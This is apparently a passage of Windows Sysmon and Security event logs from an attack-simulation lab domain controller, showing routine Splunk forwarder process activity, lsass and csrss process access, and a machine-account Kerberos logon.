{"EventTime":"2020-08-01 05:48:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3890,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:54.894\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0246-5F25-0000-0010A2D40500}\r\nTargetProcessId: 4224\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:54.894","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0246-5F25-0000-0010A2D40500}","TargetProcessId":"4224","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3891,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:55.050\r\nSourceProcessGUID: {A837DB8D-0246-5F25-0000-0010A2D40500}\r\nSourceProcessId: 4224\r\nSourceThreadId: 4204\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe+577205|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe+576d36|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe+56c09|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe+572d6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe+8fe2c4|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:55.050","SourceProcessGUID":"{A837DB8D-0246-5F25-0000-0010A2D40500}","SourceProcessId":"4224","SourceThreadId":"4204","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","TargetProcessId":"2868","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe+577205|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe+576d36|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe+56c09|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe+572d6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe+8fe2c4|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3892,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:55.066\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 992\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-0246-5F25-0000-0010A2D40500}\r\nTargetProcessId: 4224\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:55.066","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"992","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-0246-5F25-0000-0010A2D40500}","TargetProcessId":"4224","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3893,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:55.066\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 992\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-0246-5F25-0000-0010A2D40500}\r\nTargetProcessId: 4224\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:55.066","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"992","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-0246-5F25-0000-0010A2D40500}","TargetProcessId":"4224","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220408,"ProcessID":864,"ThreadID":992,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x5D83D\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x5d83d","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 05:48:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220409,"ProcessID":864,"ThreadID":992,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x5D83D\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{433511B1-83A7-FED9-9147-785D15F197B0}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\tfe80::3413:3332:6143:4f60\r\n\tSource Port:\t\t54872\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-881393$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x5d83d","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{433511B1-83A7-FED9-9147-785D15F197B0}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"fe80::3413:3332:6143:4f60","IpPort":"54872","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:48:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3894,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:55.482\r\nProcessGuid: {A837DB8D-0247-5F25-0000-00107AD90500}\r\nProcessId: 4568\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Windows Print Monitor \r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-winprintmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:48:55.482","ProcessGuid":"{A837DB8D-0247-5F25-0000-00107AD90500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","FileVersion":"8.0.2","Description":"Windows Print Monitor ","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-winprintmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:48:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3895,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:55.473\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 2168\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-0247-5F25-0000-00107AD90500}\r\nTargetProcessId: 4568\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:55.473","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"2168","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-0247-5F25-0000-00107AD90500}","TargetProcessId":"4568","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3896,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:55.473\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0247-5F25-0000-00107AD90500}\r\nTargetProcessId: 4568\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:55.473","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0247-5F25-0000-00107AD90500}","TargetProcessId":"4568","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:48:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3897,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:55.473\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: 